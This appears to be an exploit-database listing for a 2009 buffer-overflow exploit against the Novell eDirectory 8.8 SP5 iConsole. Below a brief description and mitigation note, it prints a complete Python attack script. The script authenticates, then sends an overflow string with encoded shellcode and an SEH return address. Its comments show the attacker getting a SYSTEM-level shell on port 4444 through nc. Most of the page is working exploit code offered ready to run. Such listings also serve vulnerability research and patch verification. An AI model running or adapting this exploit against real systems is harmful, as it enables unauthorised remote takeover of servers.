header-logo
Suggest Exploit
vendor:
eDirectory
by:
Matteo Memelli
9.3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: eDirectory
Affected Version From: 8.8 SP5
Affected Version To: 8.8 SP5
Patch Exists: YES
Related CWE: N/A
CPE: a:novell:edirectory
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

Novell eDirectory 8.8 SP5 iConsole BOF

This exploit is for Novell eDirectory 8.8 SP5 iConsole. It was found by Hellcode Labs and the original POC was provided by SecurityFocus. It was coded by Matteo Memelli of Offensive Security. It is a buffer overflow exploit which uses Msf::Encoder::PexAlphaNum with a final size of 709 bytes. It uses a GET request to send the malicious payload to the vulnerable server.

Mitigation:

Upgrade to the latest version of Novell eDirectory 8.8 SP5 iConsole.
Source

Exploit-DB raw data:

#!/usr/bin/python
# Novell eDirectory 8.8 SP5 iConsole BOF
# Vulnerability found by Hellcode Labs, 
# Original POC http://downloads.securityfocus.com/vulnerabilities/exploits/36815.pl
# 
# Exploit coded by Matteo Memelli | ryujin __A-T__ offensive-security.com
# www.offensive-security.com
# Spaghetti & Pwnsauce - 04/11/2009 
#
# Process dhost.exe becomes unstable after pwnage, so we need to connect quickly to save our shell ;)
#
# root@bt:~# ./gotohell.py 172.16.30.201;nc -v 172.16.30.201 4444
# 302 Found
# DHAC1=c8280012; Path=/
# 172.16.30.201: inverse host lookup failed: Unknown server error : Connection timed out
# (UNKNOWN) [172.16.30.201] 4444 (?) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
# 
# C:\Novell\NDS\DIBFiles>whoami
# whoami
# nt authority\system
# 
# C:\Novell\NDS\DIBFiles>
 

import sys
import httplib, urllib

try:
   HOST = sys.argv[1]
except IndexError:
   print "Usage: %s HOST" % sys.argv[0]

def do_auth(usr, pwd):
   params = urllib.urlencode({'usr': usr, 'pwd': pwd, 'button': 'Login'})
   headers = {"Content-type": "application/x-www-form-urlencoded",
              "Accept": "text/plain"}
   conn = httplib.HTTPSConnection("%s:8030" % HOST)
   conn.request("POST", "/_LOGIN_SERVER_RSP_", params, headers)
   response = conn.getresponse()
   cookie=response.getheaders()[1][1]
   print response.status, response.reason
   data = response.read()
   conn.close()
   print cookie
   return cookie

def do_pwn(evil, cookie):
   headers = {"Host": "%s:8030" % HOST,
              "Cookie": "%s" % cookie}
   conn = httplib.HTTPSConnection("%s:8030" % HOST)
   conn.request("GET", "/dhost/modules?L:"+evil, None, headers)

# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48"
"\x4e\x36\x46\x52\x46\x42\x4b\x58\x45\x54\x4e\x43\x4b\x38\x4e\x37"
"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x58"
"\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x58"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x32\x45\x47\x45\x4e\x4b\x58"
"\x4f\x55\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x34"
"\x4b\x48\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x30\x4e\x52\x4b\x38"
"\x49\x58\x4e\x36\x46\x42\x4e\x41\x41\x36\x43\x4c\x41\x43\x4b\x4d"
"\x46\x56\x4b\x48\x43\x44\x42\x53\x4b\x58\x42\x44\x4e\x30\x4b\x48"
"\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x34\x4a\x30\x50\x35\x4a\x56"
"\x50\x48\x50\x54\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x46"
"\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x36\x47\x37\x43\x57"
"\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e"
"\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x46\x44\x50"
"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"
"\x4f\x4f\x48\x4d\x43\x45\x43\x35\x43\x45\x43\x55\x43\x45\x43\x34"
"\x43\x45\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x56\x4a\x36\x41\x31"
"\x4e\x35\x48\x46\x43\x45\x49\x48\x41\x4e\x45\x59\x4a\x46\x46\x4a"
"\x4c\x41\x42\x37\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x41"
"\x41\x45\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x52"
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x56\x45\x4e\x49\x44\x48\x38\x49\x54\x47\x55\x4f\x4f\x48\x4d"
"\x42\x55\x46\x45\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46"
"\x47\x4e\x49\x57\x48\x4c\x49\x57\x47\x55\x4f\x4f\x48\x4d\x45\x55"
"\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x36\x48\x36\x4a\x56\x43\x36"
"\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x45\x49\x32\x4e\x4c"
"\x49\x48\x47\x4e\x4c\x56\x46\x34\x49\x48\x44\x4e\x41\x33\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x54\x4e\x52"
"\x43\x39\x4d\x58\x4c\x57\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
"\x44\x37\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x47\x46\x34\x4f\x4f"
"\x48\x4d\x4b\x35\x47\x45\x44\x35\x41\x35\x41\x35\x41\x45\x4c\x56"
"\x41\x30\x41\x35\x41\x35\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x56"
"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x48\x47\x55\x4e\x4f"
"\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"
"\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x45\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a")

## PUT YOUR CREDENTIALS HERE ##
usr = ".Admin.O=offsec.OFFSEC."
pwd = "admin"
###############################
j1  = "\xEB\x06\x90\x90"
j2  = "\xE9\x26\xFD\xFF\xFF"
n1  = "\x90"*8
n2  = "\x90"*4
p1  = "\x41"*947
p2  = "\x42"*221
ret = "\x6A\x38\x81\x64" # 0x6481386A nmasldap.dll SafeSEH unprotected
evil = p1 + n1 + shellcode + j1 + ret + n2 + j2 + p2
# sweet biscuit...
cookie = do_auth(usr, pwd)
# sh...
do_pwn(evil, cookie)